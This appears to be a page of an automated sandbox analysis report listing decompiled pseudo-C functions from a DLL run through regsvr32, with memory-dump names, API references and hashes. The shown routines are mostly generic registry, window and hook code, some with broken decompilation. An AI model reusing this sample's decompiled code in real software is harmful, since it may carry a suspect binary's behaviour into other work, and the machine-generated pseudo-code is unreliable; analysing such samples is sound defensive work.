Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: a9da12fd52db696f87105b4325a6c1ef7aa54a212dc465f458d9910f396633a7
Instruction ID: 20d00d736e116b2d0e2ee73c082a63d4016e6749724e061fb4c0ac89ccd0000b
Opcode Fuzzy Hash: a9da12fd52db696f87105b4325a6c1ef7aa54a212dc465f458d9910f396633a7
Instruction Fuzzy Hash: 4A31C036D00255AECB12DBA4C8859EEBBB8EF55250F31023AF862E3191EF305E45DB58

Uniqueness

Uniqueness Score: -1.00%

Function 10063843 Relevance: 7.6, APIs: 5, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E10063843(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				void* _t46;
				CHAR* _t59;
				void* _t61;
				CHAR* _t64;
				void* _t78;

				_t61 = __ecx;
				E1001A9E0(0x10076a84, _t78);
				E1001B2B0(0x100c, __ecx);
				 *(_t78 - 0x14) = 0;
				if( *((intOrPtr*)(_t61 + 0x7c)) == 0) {
					__eflags =  *(_t78 + 0x14);
					if( *(_t78 + 0x14) == 0) {
						 *(_t78 + 0x14) = 0x10094898;
					}
					GetPrivateProfileStringA( *(_t78 + 0xc),  *(_t78 + 0x10),  *(_t78 + 0x14), _t78 - 0x1018, 0x1000,  *(_t61 + 0x90));
					_push(_t78 - 0x1018);
					goto L12;
				} else {
					_t46 = E10063791(_t61,  *(_t78 + 0xc));
					 *(_t78 - 0x10) = _t46;
					if(_t46 != 0) {
						_t64 =  *0x1008f630; // 0x1008f644
						 *(_t78 + 0xc) = _t64;
						 *(_t78 - 4) = 0;
						_t59 = RegQueryValueExA(_t46,  *(_t78 + 0x10), 0, _t78 - 0x14, 0, _t78 - 0x18);
						__eflags = _t59;
						if(_t59 == 0) {
							_t59 = RegQueryValueExA( *(_t78 - 0x10),  *(_t78 + 0x10), 0, _t78 - 0x14, E10045D4E(_t78 + 0xc, _t78,  *(_t78 - 0x18)), _t78 - 0x18);
							E10045D9D(_t78 + 0xc, __eflags, 0xffffffff);
						}
						RegCloseKey( *(_t78 - 0x10));
						__eflags = _t59;
						if(_t59 != 0) {
							E1004598C( *((intOrPtr*)(_t78 + 8)), _t78,  *(_t78 + 0x14));
						} else {
							E10045693( *((intOrPtr*)(_t78 + 8)), _t78 + 0xc);
						}
						 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
						E1004591E(_t78 + 0xc);
					} else {
						_push( *(_t78 + 0x14));
						L12:
						E1004598C( *((intOrPtr*)(_t78 + 8)), _t78);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
				return  *((intOrPtr*)(_t78 + 8));
			}

0x10063843
0x10063848
0x10063852
0x1006385d
0x10063860
0x10063906
0x10063909
0x1006390b
0x1006390b
0x1006392d
0x10063939
0x00000000
0x10063866
0x10063869
0x10063870
0x10063873
0x1006387d
0x10063885
0x10063898
0x100638a1
0x100638a3
0x100638a5
0x100638c9
0x100638cb
0x100638cb
0x100638d3
0x100638da
0x100638dd
0x100638f3
0x100638df
0x100638e6
0x100638e6
0x100638f8
0x100638ff
0x10063875
0x10063875
0x1006393a
0x1006393d
0x1006393d
0x10063873
0x10063949
0x10063951

APIs

__EH_prolog.LIBCMT ref: 10063848
RegQueryValueExA.ADVAPI32 ref: 1006389F
RegQueryValueExA.ADVAPI32 ref: 100638C2
RegCloseKey.ADVAPI32(?), ref: 100638D3
GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 1006392D

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: QueryValue$CloseH_prologPrivateProfileString
String ID:
API String ID: 1022837590-0
Opcode ID: 9b7f5ee78d454275031e12bb087dc15c8588af5c5446859d01088d2c975bbc40
Instruction ID: 119d9c8d803b5be352a0ea95aeed38068d819dc47d254422fd9dd0e6ae17e381
Opcode Fuzzy Hash: 9b7f5ee78d454275031e12bb087dc15c8588af5c5446859d01088d2c975bbc40
Instruction Fuzzy Hash: 8731387190014AEFCF15DF90CC40CEE7BBAFF44360F20812AF965A61A1DB719A55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 100376AA Relevance: 7.6, APIs: 5, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E100376AA(intOrPtr __ecx) {
				void* __esi;
				struct HWND__* _t40;
				void* _t42;
				void* _t50;
				intOrPtr _t63;
				signed int _t66;
				void* _t83;

				_t63 = __ecx;
				E1001A9E0(0x100781b4, _t83);
				_push(__ecx);
				_push(__ecx);
				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
					L9:
					E1004598C( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
				} else {
					_t40 =  *(__ecx + 0x1c);
					if(_t40 == 0) {
						goto L9;
					} else {
						_t66 =  *0x1008f630; // 0x1008f644
						 *(_t83 - 0x10) = _t66;
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						_t42 = E10041F78(_t83, GetParent(_t40));
						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E10045D4E(_t83 - 0x10, _t83, 0x104)) >= 0) {
							E10045D9D(_t83 - 0x10, __eflags, 0xffffffff);
						} else {
							E100458A9(_t83 - 0x10, 0x104);
						}
						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
							L8:
							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
							E1004591E(_t83 - 0x10);
							_t63 =  *((intOrPtr*)(_t83 - 0x14));
							goto L9;
						} else {
							_t50 = E10041F78(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E10045D4E(_t83 - 0x10, _t83, 0x104)) >= 0) {
								E10045D9D(_t83 - 0x10, __eflags, 0xffffffff);
								E10045693( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
								E1004591E(_t83 - 0x10);
							} else {
								E100458A9(_t83 - 0x10, 0x104);
								goto L8;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return  *((intOrPtr*)(_t83 + 8));
			}

0x100376aa
0x100376af
0x100376b4
0x100376b5
0x100376b6
0x100376c4
0x100376c7
0x10037777
0x1003777d
0x100376cd
0x100376cd
0x100376d2
0x00000000
0x100376d8
0x100376d8
0x100376de
0x100376e7
0x100376ef
0x10037718
0x10037729
0x1003771a
0x1003771d
0x1003771d
0x10037735
0x10037768
0x10037768
0x1003776f
0x10037774
0x00000000
0x10037737
0x10037740
0x1003775e
0x1003779b
0x100377a7
0x100377ac
0x100377b3
0x10037760
0x10037763
0x00000000
0x10037763
0x1003775e
0x10037735
0x100376d2
0x1003778b
0x10037793

APIs

__EH_prolog.LIBCMT ref: 100376AF
GetParent.USER32(?), ref: 100376EC
SendMessageA.USER32 ref: 10037714
GetParent.USER32(?), ref: 1003773D
SendMessageA.USER32 ref: 1003775A

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: MessageParentSend$H_prolog
String ID:
API String ID: 1056721960-0
Opcode ID: 630485d7385c306ba31509f6193fb3230afb231376ab1b4bf583a64375c17142
Instruction ID: 2e0edf0754cc647a76df1d0c99cf7c0c20d8cc0605c1b1dc3082396a5bcaa2bc
Opcode Fuzzy Hash: 630485d7385c306ba31509f6193fb3230afb231376ab1b4bf583a64375c17142
Instruction Fuzzy Hash: 4C31817490021AEBDB15DFA4CC85EEEB774FF01365F204629E425AB1E2DB31AE05CB54

Uniqueness

Uniqueness Score: -1.00%

Function 1002AA50 Relevance: 7.6, APIs: 5, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002AA50(signed int _a8) {
				intOrPtr _v0;
				signed int _t28;
				struct HINSTANCE__* _t29;
				struct HHOOK__* _t30;
				signed int _t31;
				signed int _t33;
				signed int _t40;
				signed int _t42;
				signed int _t44;
				intOrPtr* _t45;
				signed int _t46;
				long _t48;
				signed int _t50;

				if( *0x10096d40 >= 0x30a) {
					__eflags =  *0x10096d20;
					if( *0x10096d20 != 0) {
						_t50 = _a8 | 0x00000001;
						__eflags = _t50 & 0x00000002;
						if((_t50 & 0x00000002) != 0) {
							_t50 = _t50 & 0xfffffffc;
							__eflags = _t50;
						}
						EnterCriticalSection(0x10096ac0);
						__eflags =  *0x10096d7c - 0x80;
						if( *0x10096d7c == 0x80) {
							L15:
							LeaveCriticalSection(0x10096ac0);
							__eflags = 0;
							return 0;
						} else {
							_t48 = GetCurrentThreadId();
							_t28 = 0;
							__eflags =  *0x10096d7c - _t28; // 0x0
							if(__eflags <= 0) {
								L11:
								_t29 =  *0x10096d3c; // 0x0
								_t30 = SetWindowsHookExA(5, E1002BC70, _t29, _t48);
								__eflags = _t30;
								if(_t30 == 0) {
									goto L15;
								} else {
									_t46 =  *0x10096d7c; // 0x0
									 *((intOrPtr*)((_t46 << 2) + 0x10096d80 + (_t46 << 2) * 4)) = _v0;
									_t40 =  *0x10096d7c; // 0x0
									 *((_t40 << 2) + 0x10096d84 + (_t40 << 2) * 4) = _t48;
									_t42 =  *0x10096d7c; // 0x0
									 *((_t42 << 2) + 0x10096d88 + (_t42 << 2) * 4) = _t30;
									_t31 =  *0x10096d7c; // 0x0
									 *((intOrPtr*)((_t31 << 2) + 0x10096d8c + (_t31 << 2) * 4)) = 1;
									_t33 =  *0x10096d7c; // 0x0
									 *((_t33 << 2) + 0x10096d90 + (_t33 << 2) * 4) = _t50;
									_t44 =  *0x10096d7c; // 0x0
									 *0x10096d74 = _t48;
									 *0x10096d78 = _t44;
									 *0x10096d7c =  *0x10096d7c + 1;
									__eflags =  *0x10096d7c;
									goto L13;
								}
							} else {
								_t45 = 0x10096d84;
								while(1) {
									__eflags =  *_t45 - _t48;
									if( *_t45 == _t48) {
										break;
									}
									_t45 = _t45 + 0x14;
									_t28 = _t28 + 1;
									__eflags = _t28 -  *0x10096d7c; // 0x0
									if(__eflags < 0) {
										continue;
									} else {
										goto L11;
									}
									goto L16;
								}
								 *((intOrPtr*)((_t28 << 2) + 0x10096d8c + _t36 * 4)) =  *((intOrPtr*)((_t28 << 2) + 0x10096d8c + _t36 * 4)) + 1;
								L13:
								LeaveCriticalSection(0x10096ac0);
								return 1;
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return 0;
				}
				L16:
			}

0x1002aa5b
0x1002aa64
0x1002aa6b
0x1002aa78
0x1002aa7b
0x1002aa81
0x1002aa83
0x1002aa83
0x1002aa83
0x1002aa8b
0x1002aa91
0x1002aa9b
0x1002ab77
0x1002ab7c
0x1002ab82
0x1002ab86
0x1002aaa1
0x1002aaa7
0x1002aaa9
0x1002aaab
0x1002aab1
0x1002aacc
0x1002aacd
0x1002aada
0x1002aae0
0x1002aae2
0x00000000
0x1002aae8
0x1002aae8
0x1002aaf5
0x1002aafc
0x1002ab05
0x1002ab0c
0x1002ab15
0x1002ab1c
0x1002ab24
0x1002ab2f
0x1002ab37
0x1002ab3e
0x1002ab44
0x1002ab4a
0x1002ab50
0x1002ab50
0x00000000
0x1002ab50
0x1002aab3
0x1002aab3
0x1002aab8
0x1002aab8
0x1002aaba
0x00000000
0x00000000
0x1002aac0
0x1002aac3
0x1002aac4
0x1002aaca
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1002aaca
0x1002ab6e
0x1002ab56
0x1002ab5b
0x1002ab68
0x1002ab68
0x1002aab1
0x1002aa6d
0x1002aa6d
0x1002aa71
0x1002aa71
0x1002aa5d
0x1002aa61
0x1002aa61
0x00000000

Memory Dump Source

Source File: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8285b4d1b59e3ba7a342fbaf80f5496bf75e5f7fb409c5d95b942bc0eb8724d0
Instruction ID: 0b1f8217234c2864057edabbb001b3e0a627047ef3c069900eb98039d58ed0ec
Opcode Fuzzy Hash: 8285b4d1b59e3ba7a342fbaf80f5496bf75e5f7fb409c5d95b942bc0eb8724d0
Instruction Fuzzy Hash: D0318C71F026218FE318DF2CDC8895577B0FB8C399B41812BE57E87260CB325889CB52

Uniqueness

Uniqueness Score: -1.00%

Function 10063562 Relevance: 7.6, APIs: 5, Instructions: 69
registryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E10063562() {
				signed int _t51;
				void* _t53;

				E1001A9E0(0x10076a34, _t53);
				_t51 = RegOpenKeyA( *(_t53 + 8),  *( *(_t53 + 0xc)), _t53 - 0x14);
				if(_t51 != 0) {
					L8:
					RegCloseKey( *(_t53 - 0x14));
					 *[fs:0x0] =  *((intOrPtr*)(_t53 - 0xc));
					return _t51;
				}
				_push(0xff);
				_push(_t53 - 0x118);
				_push(_t51);
				_push( *(_t53 - 0x14));
				while(1) {
					_t51 = RegEnumKeyA();
					if(_t51 != 0) {
						break;
					}
					E1004598C(_t53 - 0x18, _t53, _t53 - 0x118);
					 *(_t53 - 4) =  *(_t53 - 4) & _t51;
					_push(_t53 - 0x18);
					_push( *(_t53 - 0x14));
					_t51 = E10063562();
					 *((char*)(_t53 - 0xd)) = _t51 != 0;
					 *(_t53 - 4) =  *(_t53 - 4) | 0xffffffff;
					E1004591E(_t53 - 0x18);
					if( *((char*)(_t53 - 0xd)) != 0) {
						break;
					}
					_push(0xff);
					_push(_t53 - 0x118);
					_push(0);
					_push( *(_t53 - 0x14));
				}
				if(_t51 == 0x103 || _t51 == 0x3f2) {
					_t51 = RegDeleteKeyA( *(_t53 + 8),  *( *(_t53 + 0xc)));
				}
				goto L8;
			}

0x10063567
0x10063586
0x1006358a
0x1006361a
0x1006361d
0x10063629
0x10063631
0x10063631
0x100635a3
0x100635a4
0x100635a5
0x100635a6
0x100635a9
0x100635ab
0x100635af
0x00000000
0x00000000
0x100635bb
0x100635c0
0x100635c6
0x100635c7
0x100635cf
0x100635d6
0x100635da
0x100635de
0x100635e7
0x00000000
0x00000000
0x100635ef
0x100635f0
0x100635f1
0x100635f3
0x100635f3
0x10063600
0x10063618
0x10063618
0x00000000

APIs

__EH_prolog.LIBCMT ref: 10063567
RegOpenKeyA.ADVAPI32(?,?,?), ref: 10063580
RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 100635A9
RegDeleteKeyA.ADVAPI32(?,?), ref: 10063612
RegCloseKey.ADVAPI32(?), ref: 1006361D

Memory Dump Source

Source File: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466147905.00000000100D0000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd

Similarity

API ID: CloseDeleteEnumH_prologOpen
String ID:
API String ID: 3131381098-0
Opcode ID: 8a9ec97f8de35c3c599ab0a40c8fbdd8287e7759a57062229b966af8ea65fd3f
Instruction ID: 7eb6be3b29d13abaf0017bd6ba40888a586ce6f6ef800d6bd78303ece095c214
Opcode Fuzzy Hash: 8a9ec97f8de35c3c599ab0a40c8fbdd8287e7759a57062229b966af8ea65fd3f
Instruction Fuzzy Hash: 2E214172D0042ABFDB25DB94CC41AEEBBB9EF04350F118161F955A7250CB309E45DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10043B23 Relevance: 7.6, APIs: 5, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E10043B23(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t21;
				struct HWND__* _t22;
				struct HWND__* _t41;
				void* _t42;
				intOrPtr* _t43;

				_t42 = __ecx;
				_t21 = IsWindowVisible( *(__ecx + 0x1c));
				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t42 + 0x1c));
					while(1) {
						_t22 = GetWindow();
						_t41 = _t22;
						if(_t41 == 0) {
							goto L7;
						}
						GetWindowRect(_t41,  &_v20);
						L1004F07F(_t42,  &_v20);
						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t41);
					}
				}
				L7:
				_t43 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t43 != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
				}
				return _t22;
			}

0x10043b2b
0x10043b31
0x10043b39
0x10043ba2
0x10043b45
0x10043b4b
0x10043b4d
0x10043b50
0x10043b50
0x10043b52
0x10043b56
0x00000000
0x00000000
0x10043b5d
0x10043b69
0x10043b88
0x10043b8e
0x10043b90
0x10043b90
0x10043b50
0x10043ba8
0x10043ba8
0x10043bad
0x00000000
0x10043bbf
0x10043bc6

APIs

IsWindowVisible.USER32(?), ref: 10043B31
GetWindow.USER32(?,00000005), ref: 10043B50
GetWindowRect.USER32(00000000,?), ref: 10043B5D
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015), ref: 10043B88
ScrollWindow.USER32(?,?,?,?,?), ref: 10043BA2

Memory Dump Source

Source File: 00000003.00000002.465494838.0000000010036000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.465370217.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465380135.0000000010001000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465562567.000000001004C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465579832.0000000010052000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465599161.000000001005C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465623139.0000000010062000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465692011.0000000010069000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465783893.000000001006C000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465868954.000000001007A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465910344.0000000010084000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.465962472.000000001008E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466009918.000000001008F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466018211.0000000010091000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466027031.0000000010092000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466041678.0000000010094000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466048421.0000000010096000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466053383.0000000010098000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466059840.000000001009A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.466076947.000000001009C000.00000002.00000001.01000000.00000005.sdmpDownload File
